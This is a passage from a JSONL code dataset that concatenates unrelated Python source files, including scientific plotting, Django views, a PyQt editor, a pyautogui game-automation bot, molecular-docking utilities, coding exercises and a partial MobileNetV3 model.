sample_numth_eig_new(itera, res, num, start_tile): # iter is the iteration number,\\\r\n # res is the sampling resolution, num is the eigenvlaue number\r\n x = np.linspace(-cmath.pi, cmath.pi, res+1 )\r\n y = np.linspace(-cmath.pi, cmath.pi, res+1 )\r\n size = 2**(2*itera)\r\n if num>size or num<0:\r\n print('num value is incorrect')\r\n return\r\n if num > 0:\r\n eig_mat = [[0 for a in range(res+1)] for b in range(res+1) ]\r\n elif num == 0:\r\n eig_mat = [[0.0 for a in range(size) ] for s in range(2)]\r\n #[ [[0 for a in range(res+1)] for b in range(res+1) ] for j in range(size) ]\r\n Tile = BuiltTile(itera,start_tile)\r\n mat1 = np.array(Op_Mat_NoPhase(itera, Tile))\r\n for k in range(res+1):\r\n for l in range(res+1):\r\n mat2 = np.array( Op_Mat_Phase(itera,phase(x[k],y[l])) )\r\n mat = np.add(mat1, mat2)\r\n vect=LA.eigvalsh( mat )\r\n if num != 0:\r\n eig_mat[k][l] = vect[num - 1]\r\n elif num == 0:\r\n for j in range(size):\r\n if k==0 and l==0:\r\n eig_mat[0][j] = vect[j]\r\n eig_mat[1][j] = vect[j]\r\n else:\r\n eig_mat[0][j] = max(vect[j] , eig_mat[0][j] )\r\n eig_mat[1][j] = min(vect[j], eig_mat[1][j])\r\n print(\"(\"+str(x[k])+\",\"+str(y[l])+\")\"+\" computed\")\r\n return eig_mat","sub_path":"Aux_matrix.py","file_name":"Aux_matrix.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"179033615","text":"import pyautogui\nimport time\nimport re\nimport sys\nimport os\n\n\nclass Dailies:\n # Variables\n rotationsAfterBoss = 0\n\n # Initializing Object\n def __init__(self, bot):\n self.zone = \"123\"\n self.game_bot = bot\n\n self.battle_screen = bot.data[\"battle\"]\n self.town_screen = bot.data[\"town\"]\n self.campaign_screen = bot.data[\"campaign\"]\n self.coordinates = bot.data[\"campaign\"][\"icons\"]\n\n def moveDailyMenuLeft(self):\n pyautogui.click(100, 400)\n pyautogui.dragTo(1800, 400, 0.5, button='left')\n pyautogui.click(100, 400)\n pyautogui.dragTo(1800, 400, 0.5, button='left')\n time.sleep(1)\n\n def moveDailyMenuRight(self):\n pyautogui.click(1800, 400)\n pyautogui.dragTo(100, 400, 0.5, button='left')\n pyautogui.click(1800, 400)\n pyautogui.dragTo(100, 400, 0.5, button='left')\n time.sleep(1)\n\n def processDailyMissions(self):\n self.game_bot.db.refreshData()\n self.server = self.game_bot.db.getServerString()\n self.dailies_data = self.game_bot.db.data[self.server][\"campaign_progress\"][\"dailies\"]\n game_bot = self.game_bot\n\n self.enterDailyLiberationZone()\n self.finishLiberationDailies()\n self.game_bot.db.saveDataFile()\n\n self.exitDailyLiberation()\n self.exitDailyMenu()\n self.returnToBattleScreen()\n\n def enterDailyLiberationZone(self):\n self.game_bot.click(self.coordinates[\"campaign_daily_start\"])\n self.game_bot.click(self.coordinates[\"campaign_daily_liberation_open\"])\n self.moveDailyMenuLeft()\n\n def finishLiberationDailies(self):\n missions = self.coordinates[\"daily_missions\"][\"mission_set_1\"]\n liberation_has_completed = self.dailies_data[\"liberation\"]\n server = self.server\n wait_time = self.game_bot.db.data[self.server][\"campaign_progress\"][\"daily_wait_time\"]\n\n for mission in missions:\n if not liberation_has_completed[mission] and liberation_has_completed[mission] != \"locked\":\n self.game_bot.click(missions[mission])\n self.game_bot.db.data[server][\"campaign_progress\"][\"dailies\"][\"liberation\"][mission] = True\n self.game_bot.db.saveDataFile()\n time.sleep(wait_time)\n self.game_bot.click(self.coordinates[\"battle_ok\"])\n time.sleep(2)\n\n self.moveDailyMenuRight()\n\n def exitDailyLiberation(self):\n self.game_bot.click(self.coordinates[\"daily_liberation_x_icon\"])\n\n def exitDailyMenu(self):\n self.game_bot.click(self.coordinates[\"daily_main_x_icon\"])\n\n def returnToBattleScreen(self):\n self.game_bot.click(self.coordinates[\"x_icon\"])\n self.game_bot.click(self.coordinates[\"x_icon\"])\n","sub_path":"Firestone V2/actors/campaign/Dailies.py","file_name":"Dailies.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294158459","text":"# coding:utf-8\n\ndef solve():\n s, t = map(str, input().split())\n s1 = s\n for i in range(len(s)):\n if str(s[i]) not in t:\n s1 = s1.replace(s[i], '')\n if t in s1:\n print('YES')\n return\n print('NO')\n return\n\n\ndef main():\n Q = int(input())\n for i in range(Q):\n solve()\n\n\nmain()\n","sub_path":"library_python/AtCoder_Event/THNKS2015/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"221571354","text":"import logging\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\n\n\nclass CentralPanelCw(QtWidgets.QWidget):\n # noinspection PyArgumentList,PyUnresolvedReferences\n def __init__(self):\n super().__init__()\n\n self.saved_text_str = (\n\"\"\"\n

How does this contribute to my well-being?

\n

How does this contribute to the well-being of others?

\n

Joyful about this activity

\n

Difficult about this activity

\n

Boost for getting started with this activity

\nExamples: Sugar\n

Support during this activity

\n\nExamples: Music, snacks\nSharing this activity with others\n\n
\n\nsaved text Text in another color (for ingrained habits) back to black!\nMore text here, we can add templates with headers and so on.\n\"\"\"\n )\n\n vbox_l2 = QtWidgets.QVBoxLayout()\n self.setLayout(vbox_l2)\n\n self.habit_qte = QtWidgets.QTextEdit()\n #self.habit_qte.setReadOnly(True)\n self.habit_qte.zoomIn(3)\n #self.habit_qte.copyAvailable.connect(self.on_habit_copy_available)\n vbox_l2.addWidget(self.habit_qte, stretch=5)\n\n self.update_gui()\n\n def on_habit_copy_available(self, i_available:bool):\n if i_available:\n self.habit_qte.copy()\n self.diary_entry_qpte.paste()\n\n def on_edit_rich_text_clicked(self):\n self.input_text_editor = InputTextEditorDialog(self.saved_text_str)\n self.input_text_editor.finished.connect(self.on_input_text_editor_finished)\n self.input_text_editor.show()\n \"\"\"\n result_tuple = QtWidgets.QInputDialog.getMultiLineText(\n self,\n \"title\",\n \"label\",\n self.saved_text_str\n )\n # http://doc.qt.io/qt-5/qinputdialog.html#getMultiLineText\n\n if result_tuple[1] == True:\n self.saved_text_str = result_tuple[0]\n self.habit_qte.setHtml(self.saved_text_str)\n \"\"\"\n\n def on_input_text_editor_finished(self, i_result: int):\n if i_result == QtWidgets.QDialog.Accepted:\n self.saved_text_str = self.input_text_editor.plain_text_edit_qpte.toPlainText()\n self.update_gui()\n\n def update_gui(self):\n self.habit_qte.setHtml(self.saved_text_str)\n\n\nclass InputTextEditorDialog(QtWidgets.QDialog):\n def __init__(self, i_start_text:str, i_parent=None):\n super(InputTextEditorDialog, self).__init__(i_parent)\n\n self.setModal(True)\n\n vbox_l2 = QtWidgets.QVBoxLayout()\n self.setLayout(vbox_l2)\n\n hbox_button_row_l3 = QtWidgets.QHBoxLayout()\n vbox_l2.addLayout(hbox_button_row_l3)\n\n self.ingrained_qpb = QtWidgets.QPushButton(\"Ingrained\")\n self.ingrained_qpb.clicked.connect(self.on_ingrained_clicked)\n hbox_button_row_l3.addWidget(self.ingrained_qpb)\n\n self.header_qpb = QtWidgets.QComboBox()\n self.header_qpb.addItems([\"h1\", \"h2\", \"h3\", \"h4\", \"h5\", \"h6\"])\n self.header_qpb.activated.connect(self.on_header_activated)\n hbox_button_row_l3.addWidget(self.header_qpb)\n\n self.plain_text_edit_qpte = QtWidgets.QPlainTextEdit()\n self.plain_text_edit_qpte.setPlainText(i_start_text)\n vbox_l2.addWidget(self.plain_text_edit_qpte)\n\n self.button_box = QtWidgets.QDialogButtonBox(\n QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,\n QtCore.Qt.Horizontal,\n self\n )\n vbox_l2.addWidget(self.button_box)\n self.button_box.accepted.connect(self.accept)\n self.button_box.rejected.connect(self.reject)\n\n def on_header_activated(self, i_index: int):\n self.plain_text_edit_qpte.cut()\n self.plain_text_edit_qpte.insertPlainText(\"\")\n self.plain_text_edit_qpte.paste()\n self.plain_text_edit_qpte.insertPlainText(\"\")\n\n def on_ingrained_clicked(self):\n self.plain_text_edit_qpte.cut()\n self.plain_text_edit_qpte.insertPlainText('')\n self.plain_text_edit_qpte.paste()\n self.plain_text_edit_qpte.insertPlainText('')\n\n # get marked/selected text\n # adding ___________\n","sub_path":"wbn/habits/central_panel.py","file_name":"central_panel.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159875211","text":"import deltasigma\nimport numpy as np\n\nclass ExtractRidgePoint:\n def __init__(self):\n self.THRESHOLD = 0.5\n self.none_zero_index = list()\n\n # remove isolated points\n self.iterations = 3\n self.DIM_MAX = 5\n self.DIM_MIN = 2\n\n self.point_x = list()\n self.point_y = list()\n\n def execute_ridge_point_extraction(self, fx, fy, frangied_img):\n Fx_1 = deltasigma.circshift(fx, [0, -1]) # fx in -X direction\n print(\"sdsd\", Fx_1)\n\n Fy_1 = deltasigma.circshift(fy, [0, -1]) # fy in -X direction\n Fx_2 = deltasigma.circshift(fx, [0, 1]) # fx in +X direction\n Fy_2 = deltasigma.circshift(fy, [0, 1]) # fy in +X direction\n Fx_3 = deltasigma.circshift(fx, [-1, 0]) # fx in -Y direction\n Fy_3 = deltasigma.circshift(fy, [-1, 0]) # fy in -Y direction\n Fx_4 = deltasigma.circshift(fx, [1, 0]) # fx in +Y direction\n Fy_4 = deltasigma.circshift(fy, [1, 0]) # fy in +Y direction\n\n Ta = 0.\n Fx_ridge = np.dot((fx > 0),\n ((np.dot(fx, Fx_1) + np.dot(fy, Fy_1) < Ta).any() and (np.dot(fx, Fx_2) + np.dot(fy, Fy_2) > Ta).any()))\n Fy_ridge = np.dot((fy > 0).all(),\n ((np.dot(fx, Fx_3) + np.dot(fy, Fy_3) < Ta).any() and (np.dot(fx, Fx_4) + np.dot(fy, Fy_4) > Ta).any()))\n\n\n # Truncate the boundary output\n a, b = frangied_img.shape\n m1 = 2\n m2 = 2\n MaskRidgePoint = np.ones([a, b])\n MaskRidgePoint[1:m1, :] = 0\n MaskRidgePoint[a - m1 + 1: a, :] = 0\n MaskRidgePoint[:, 1: m2] = 0\n MaskRidgePoint[:, b - m2 + 1: b] = 0\n\n RidgePointINDs = np.where((Fx_ridge.any() or Fy_ridge.any()) and MaskRidgePoint.any() > 0)\n px, py = self.ind2sub([a, b], np.array(RidgePointINDs))\n result = []\n for i in range(len(px)):\n result.append((px[i], py[i]))\n print(result)\n return result\n\n def ind2sub(self, array_shape, ind):\n ind[ind < 0] = -1\n ind[ind >= array_shape[0] * array_shape[1]] = -1\n rows = (ind.astype('int') / array_shape[1])\n cols = ind % array_shape[1]\n return rows, cols\n\n","sub_path":"src/MSAProcessingUnit/ExtractRidgePoint.py","file_name":"ExtractRidgePoint.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616371322","text":"#Script Name: make_csv_tables_from_mol2.py\n#Script Purpose: creates CSV tables containing all the header information in DOCK6's multimolecule mol2 outputs.\n# It also creates a DAT file containing the line numbers defining where each molecule starts and ends.\n#Author Name: Guilherme D. R. Matos\n#Affiliation: Rizzo Lab, Stony Brook University\n#Create date: 08/20/2020\n#Last edit: 06/07/2021 Guilherme D. R. Matos/SBU\n\nimport os\nimport sys\nimport pandas as pd\nfrom copy import deepcopy\n\n\n#####################\n# Utility Functions #\n#####################\n\ndef discover_beginning(end):\n # If you know where a molecule ends, you know when the next begin\n begin = [0] # Assume the first molecule begins at idx=0\n for idx in end:\n begin.append(idx + 1)\n # After loop is done, remove last element of list\n del begin[-1]\n return begin\n\n\ndef discover_ends(filename, end_pattern):\n data = open(filename, 'r+')\n lines = data.readlines()\n \n # Loop over all lines and find pattern\n end = []\n for idx, line in enumerate(lines):\n if end_pattern in line:\n end.append(idx)\n else: continue\n \n # Use 'discover_beginning' function to find \n # indices where molecules begin.\n begin = discover_beginning(end)\n \n return begin, end\n\n\ndef create_dataframe_from_mol2(filename, descriptor_list):\n data = open(filename, 'r+')\n lines = data.readlines()\n \n # Create empty dataframe\n df = pd.DataFrame()\n \n # Loop over descriptor list and lines of the mol2 file to\n # collect the data.\n for entry in descriptor_list:\n tmp = []\n for line in lines:\n if entry in line:\n broken_line = line.split()\n # Append the data of interest\n tmp.append(broken_line[2])\n else: continue\n df[entry] = tmp\n \n return df\n\n\n##############\n# Main #\n##############\n\n# Exit if not Python 3.X\nif sys.version_info[:1] < (3,):\n sys.exit(\"This is a Python 3 script. Python 2.7 is deprecated and should not be used.\")\n\n# Check if input was properly given\nif len(sys.argv) != 2:\n print(\"You should use the script in the following way:\")\n print(f\"{sys.argv[0]} multimol_mol2file\")\n sys.exit()\n\n# Assign user input to variable\nmol2file = sys.argv[1]\n\n# Important variables\nend_pattern = '0 ROOT'\ndescriptors = [\"Name_DOCK\",\"From_List\",\"List_Rank\",\"Name_MOE\",\"Cluster_size\",\n \"TotalScore_(FPS+DCE)\",\"Continuous_Score\",\"Continuous_vdw_energy\",\n \"Internal_energy_repulsive\",\"Footprint_Similarity_Score\",\n \"FPS_vdw_fps\",\"FPS_es_fps\",\"FPS_hb_fps\",\"FPS_vdw_fp_numres\",\n \"FPS_es_fp_numres\",\"FPS_hb_fp_numres\",\"Num_H-bonds\",\"DOCK_rot_bonds\",\n \"Pharmacophore_Score\",\"Property_Volume_Score\",\"Tanimoto_Score\",\n \"Hungarian_Matching_Similarity_Score\",\"Descriptor_Score\",\n \"MOE_rot_bonds\",\"Molecular_weight\",\"Num_chiral_centers\",\n \"Lipinski_donors\",\"Lipinski_acceptors\",\"Lipinski_druglike\",\n \"Lipinski_violations\",\"SlogP\",\"Formal_charge\",\"logS\",\n \"Ligand_efficiency\",\"SMILES\"]\n\n# Create dataframe from mol2 file\ndata = create_dataframe_from_mol2( mol2file, descriptors )\n\n# Save csv file\ncsvname = mol2file[:-5] # remove \".mol2\" from the end\ndata.to_csv(f\"{csvname}.csv\", index=False)\n\n# Separate ZINC IDs to facilitate the retrieval of specific molecules from \n# the mol2 file. Write to file.\nzinc_ids = deepcopy( data[\"Name_DOCK\"] )\nbegin, end = discover_ends( mol2file, end_pattern )\nif (len(zinc_ids) == len(begin)) and (len(zinc_ids) == len(end)):\n with open(f\"positions_{csvname}.dat\", \"w+\") as f:\n f.write(\"Name\\tbegin_idx\\tend_idx\\n\")\n for i in range(len(zinc_ids)):\n f.write(f\"{zinc_ids[i]}\\t{begin[i]:6}\\t{end[i]:6}\\n\")\nelse:\n print(\"There is something wrong in the mol2 file\")\n\n\n\n\n","sub_path":"utilities/DOCK/data_compilation/make_csv_tables_from_mol2.py","file_name":"make_csv_tables_from_mol2.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"39443801","text":"from core.mixins import PageTitleMixin\nfrom django.views.generic import TemplateView\nfrom league.models import Season, Team\nfrom season.models import Game, StandingReport\n\n\nclass ScheduleView(PageTitleMixin, TemplateView):\n season = None\n team = None\n title = 'Season Schedule'\n template_name = 'season/schedule.html'\n\n def get_context_data(self, **kwargs):\n kwargs = super(ScheduleView, self).get_context_data()\n kwargs['schedule'] = self.get_schedule()\n kwargs['teams'] = self.get_teams_in_season()\n kwargs['season'] = self.season\n return kwargs\n\n def get_season(self):\n season_id = self.kwargs.get('season')\n try:\n self.season = Season.objects.get(id=season_id)\n except Season.DoesNotExist:\n # If season isn't specified get the current published season.\n self.season = Season.objects.filter(published=True).order_by('-start').first()\n\n def get_team(self):\n team_id = self.kwargs.get('team')\n try:\n self.team = Team.objects.get(id=team_id)\n except Team.DoesNotExist:\n pass\n\n def get_teams_in_season(self):\n teams = self.season.teams.all()\n return teams\n\n def get_schedule(self):\n self.get_season()\n self.get_team()\n\n schedule = Game.objects.filter(season=self.season)\n schedule = schedule.prefetch_related('field', 'home_team', 'away_team')\n schedule = schedule.order_by('start', )\n\n if self.team:\n home_games = schedule.filter(home_team=self.team)\n away_games = schedule.filter(away_team=self.team)\n schedule = home_games | away_games\n\n return schedule\n\n\nclass StandingsView(PageTitleMixin, TemplateView):\n season = None\n title = 'Season Standings'\n template_name = 'season/standings.html'\n\n def get_context_data(self, **kwargs):\n kwargs = super(StandingsView, self).get_context_data()\n kwargs['standings'] = self.get_standings()\n kwargs['season'] = self.season\n return kwargs\n\n def get_season(self):\n season_id = self.kwargs.get('season')\n try:\n self.season = Season.objects.get(id=season_id)\n except Season.DoesNotExist:\n # If season isn't specified get the current published season.\n self.season = Season.objects.filter(published=True).order_by('-start').first()\n\n def get_standings(self):\n self.get_season()\n\n standings = StandingReport.objects.filter(season=self.season)\n standings = standings.order_by('-wins', '-points', '-plus_minus')\n\n return standings","sub_path":"src/season/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466613769","text":"from django.urls import path\nfrom . import views\n\napp_name = 'account'\n\nurlpatterns = [\n path('profile/', views.profile_view, name='profile'),\n path('profile/edit/', views.edit_profile, name='edit_profile'),\n path('logout/', views.logout, name='logout'),\n path('list/', views.user_list, name='user_list'),\n path('myworks/', views.all_user_works, name='all_user_works'),\n path('delete/()/', views.art_delete, name='art_delete'),\n]\n","sub_path":"umetnine/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95964941","text":"from django.http import Http404\nfrom django.shortcuts import render\nfrom kiwi.models import HealthReport\nfrom datetime import datetime, timedelta\nfrom django.db.models import Count, Subquery\nfrom django.db.models.functions import TruncDate\n\n\ndef report1(request):\n\tif request.POST:\n\t\trequested_date = datetime.strptime(request.POST.get(\"date\"), '%d.%m.%Y')\n\t\tlast_week = requested_date - timedelta(days = 7)\n\n\n\t\tdata_this_week = HealthReport.objects.filter(\n\t\t\t\ttimestamp__year = requested_date.year,\n\t\t\t\ttimestamp__month = requested_date.month,\n\t\t\t\ttimestamp__day = requested_date.day\n\t\t\t).values(\"device_id\", \"device_type\", \"device_status\").annotate(cnt = Count(\"device_id\", distinct = False)).order_by(\"-cnt\", \"device_id\")[:10]\n\n\n\t\tdata = []\n\n\t\tfor d in data_this_week:\n\t\t\tdata_last_week = HealthReport.objects.filter(\n\t\t\t\t\ttimestamp__year = last_week.year,\n\t\t\t\t\ttimestamp__month = last_week.month,\n\t\t\t\t\ttimestamp__day = last_week.day\n\t\t\t\t).filter(device_id = d[\"device_id\"]).values(\"device_id\", \"device_type\", \"device_status\").annotate(cnt = Count(\"device_id\", distinct = False))\n\t\t\t\n\t\t\tdata.append({\"device_id\": d[\"device_id\"], \"device_type\": d[\"device_type\"], \"cnt\": d[\"cnt\"], \"percent\": 100 * d[\"cnt\"] / (data_last_week[0][\"cnt\"] + d[\"cnt\"])})\n\n\telse:\n\t\trequested_date = datetime.now()\n\t\tdata = []\n\n\treturn render(request, 'report1.html', {\"day\": datetime.strftime(requested_date, '%d.%m.%Y'), \"data\": data})\n\n\ndef report2(request):\n\tdevice_type = request.POST.get(\"device_type\")\n\trequested_date = datetime.now()\n\tstart_date = requested_date - timedelta(days = 30)\n\t\n\tdevice_types = HealthReport.objects.values(\"device_type\").distinct().order_by(\"device_type\")\n\n\tif request.POST:\n\t\tdata = HealthReport.objects.filter(timestamp__range=(start_date, requested_date), device_type=device_type).annotate(day = TruncDate('timestamp')).values(\"day\").annotate(cnt = Count(\"device_id\", Distinct = True)).values(\"day\", \"cnt\").order_by(\"day\")\n\telse:\n\t\tdata = []\n\n\treturn render(request, 'report2.html', {\"device_types\": device_types, \"data\": data, \"device_type\": device_type})","sub_path":"kiwi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"372458911","text":"while True:\r\n hoursWorked = input(\"How many hours did you work? \\n\")\r\n try:\r\n hoursWorked = float(hoursWorked)\r\n except ValueError:\r\n print(\"Please enter a number(i.e. 24, not twenty-four)\")\r\n continue\r\n break\r\nwhile True:\r\n payPerHour = input(\"How much do you get paid per hour? \\n\") \r\n try:\r\n payPerHour = float(payPerHour)\r\n except ValueError:\r\n print(\"Please enter a number(i.e. 24, not twenty-four)\")\r\n continue\r\n break\r\nif hoursWorked <= 40:\r\n grossWages = hoursWorked * payPerHour\r\nelse: \r\n grossWages = (payPerHour * 40) + ((hoursWorked - 40) * (payPerHour * 1.5))\r\nprint(\"Your gross wages are: \",grossWages)","sub_path":"grosswages.py","file_name":"grosswages.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257384972","text":"from math import factorial\nnum = int(input('Введите число - '))\ndef fact(num):\n for i in range(num+1):\n el = factorial(i)\n print('Факториал числа', i, '= ', end = '')\n yield el\n\nfor el in fact(num):\n print(el)\n","sub_path":"hw7.py","file_name":"hw7.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168242616","text":"import sys\nimport Server\n\n\ndef Main():\n if len(sys.argv) != 3:\n return print(\"You have not entered necessary arguments.\")\n\n input_name = sys.argv[1]\n output_name = sys.argv[2]\n\n c = Server.Init()\n Server.Clear_File(c, output_name)\n if Server.Input(c, input_name) != 0:\n if Server.Out(c, output_name) != 0:\n Server.Sort(c)\n Server.Out(c, output_name)\n Server.Out_Filter(c, output_name)\n Server.Clear(c, output_name)\n\n\nif __name__ == '__main__':\n print(\"START\")\n Main()\n print(\"STOP\")\n\n","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"652463458","text":"#DESCRIPTION:\n#generic functions for plotting data in stereonet\n\n\n#1. libraries and modules\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nimport matplotlib.cm as cm\n\n\n\n\ndef spherical_to_polar_to_cart(dip,ddir):\n #spherical (dip-dip direction or plunge-trend)\n dip=np.asarray(dip)\n ddir=np.asarray(ddir)\n z=1+np.sin(np.radians(dip))\n x=np.cos(np.radians(dip))\n zenith_angle=(np.arctan(x/z))\n #to polar (radius, theta)\n r=np.tan(zenith_angle)\n theta=-ddir+90\n #to cartesian (x,y)\n X=r*np.cos(np.radians(theta))\n Y=r*np.sin(np.radians(theta))\n return X,Y\n\ndef plot_stereonet():\n #plot blank stereonet with small circles and E-W and N-S lines\n small_circles=[15,30,45,60,75]\n theta=np.linspace(0,2*np.radians(360),1000)\n ax=plt.gca()\n X=np.cos(theta)\n Y=np.sin(theta)\n ax.plot(X,Y,'k-')\n ax.plot([-1,1],[0,0],'k-',lw=0.1)\n ax.plot([0,0],[-1,1],'k-',lw=0.1)\n sc_list=[]\n for d in small_circles:\n z=1+np.sin(np.radians(d))\n x=np.cos(np.radians(d))\n zenith_angle=(np.arctan(x/z))\n r=np.tan(zenith_angle)\n X=r*np.cos(theta)\n Y=r*np.sin(theta)\n sc=plt.plot(X,Y,'k-',lw=0.1)\n sc_list.append(sc)\n ax.axis('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n return ax,sc_list\n\ndef draw_great_circle(dip,ddir,lc,lw):\n #plot great circle on stereonet\n a=np.linspace(-90,90,1000)\n adipdir_list=ddir+a\n\n delta_az=np.abs(adipdir_list-ddir)\n delta_az=np.where(delta_az>180,360-delta_az,delta_az)\n d_adip=np.where(delta_az<=90,\n np.degrees(np.arctan(np.tan(np.radians(dip))*np.cos(np.radians(delta_az)))),\n -1*np.ones(delta_az.shape))\n\n X,Y=spherical_to_polar_to_cart(d_adip,adipdir_list)\n ax=plt.gca()\n gc=ax.plot(X,Y,'-',color=lc,lw=lw)\n return gc\n\ndef plot_colorvalue_data(dip,ddir,col,mincol,maxcol,size):\n #plot data with color value in current stereoplot\n X,Y=spherical_to_polar_to_cart(dip,ddir)\n sc=plt.scatter(X[np.argsort(col)],Y[np.argsort(col)],\n c=np.sort(col),s=size,vmin=mincol,vmax=maxcol,cmap=cm.jet,linewidth=0)\n \n \n\ndef plot_data(dip,ddir,size,mar):\n #plot data in current stereoplot\n X,Y=spherical_to_polar_to_cart(dip,ddir)\n ax=plt.gca()\n ax.scatter(X,Y,s=size,marker=mar)\n \n \n \n \n","sub_path":"generic_stereo_plotting.py","file_name":"generic_stereo_plotting.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"132988227","text":"import vtk\nimport numpy as np\nfrom vtk.util.colors import tomato\nfrom ..utils.cam_utils import get_cam_height\n\ncam_height = get_cam_height(\"LSTCam\")\n\n\ndef LST_tel_structure():\n # ARCH CREATOR\n res_arch = 100\n nsidestube = 8\n\n dist = np.linspace(-11.5, 11.5, res_arch)\n points = vtk.vtkPoints()\n for i in range(len(dist)):\n x_coord = -28/300*dist[i]**2 - 0.001*dist[i]**4 + cam_height\n y_coord = 0\n z_coord = dist[i]\n points.InsertPoint(i, x_coord, y_coord, z_coord)\n lines = vtk.vtkCellArray()\n lines.InsertNextCell(res_arch)\n\n for i in range(len(dist)):\n lines.InsertCellPoint(i)\n\n polyData = vtk.vtkPolyData()\n polyData.SetPoints(points)\n polyData.SetLines(lines)\n\n tube = vtk.vtkTubeFilter()\n tube.SetInputData(polyData)\n tube.SetNumberOfSides(nsidestube)\n tube.SetRadius(0.2)\n\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(tube.GetOutputPort())\n # mapper.ScalarVisibilityOn()\n mapper.SetScalarModeToUsePointFieldData()\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(tomato)\n #actor.SetPosition(cam_height, 0, 0)\n\n return actor\n\n\ndef LST_create_mirror_plane():\n # create a sphere\n sphere = vtk.vtkSphere()\n sphere.SetRadius(12)\n sphere.SetCenter(0, 0, 0)\n\n # create a box\n box = vtk.vtkSphere()\n box.SetRadius(28.)\n box.SetCenter(25, 0, 0)\n\n # box = vtk.vtkBox()\n # box.SetBounds(-1, 1, -1, 1, -1, 1)\n\n # combine the two implicit functions\n boolean = vtk.vtkImplicitBoolean()\n boolean.SetOperationTypeToDifference()\n\n # boolean.SetOperationTypeToUnion()\n # boolean.SetOperationTypeToIntersection()\n boolean.AddFunction(sphere)\n boolean.AddFunction(box)\n\n # The sample function generates a distance function from the implicit\n # function. This is then contoured to get a polygonal surface.\n sample = vtk.vtkSampleFunction()\n sample.SetImplicitFunction(boolean)\n sample.SetModelBounds(-50, 50, -50, 50, -50, 50)\n sample.SetSampleDimensions(200, 200, 200)\n sample.ComputeNormalsOff()\n\n # contour\n surface = vtk.vtkContourFilter()\n surface.SetInputConnection(sample.GetOutputPort())\n surface.SetValue(0, 0.0)\n\n # mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(surface.GetOutputPort())\n #mapper.ScalarVisibilityOff()\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n #actor.GetProperty().EdgeVisibilityOn()\n actor.GetProperty().SetColor(tomato)\n # actor.SetPosition(cam_height, 0, 0)\n\n return actor\n","sub_path":"CREED_VTK/telescope/LST.py","file_name":"LST.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549579041","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport time\n\n\nclass LRUCache:\n\n # @param capacity, an integer\n def __init__(self, capacity):\n self.db = {}\n self.capacity = capacity\n\n # @return an integer\n def get(self, key):\n ret = -1\n if key in self.db:\n ret = self.db[key]['val']\n self.db[key]['cnt'] = time.time()\n return ret\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n if key not in self.db and len(self.db) == self.capacity:\n min_k = None\n min_c = time.time()\n for k in self.db:\n if self.db[k]['cnt'] < min_c:\n min_c = self.db[k]['cnt']\n min_k = k\n self.db.pop(min_k)\n self.db[key] = {'val': value, 'cnt': time.time()}\n\n\n# vim:ai:et:sts=4:sw=4:\n","sub_path":"python/lru-cache.py","file_name":"lru-cache.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"490684811","text":"# Copyright 2020-2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MobileNetV3 model define\"\"\"\nfrom functools import partial\nimport numpy as np\nimport mindspore as ms\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\n\n__all__ = ['mobilenet_v3_large',\n 'mobilenet_v3_small']\n\n\ndef _make_divisible(x, divisor=8):\n return int(np.ceil(x * 1. / divisor) * divisor)\n\n\nclass 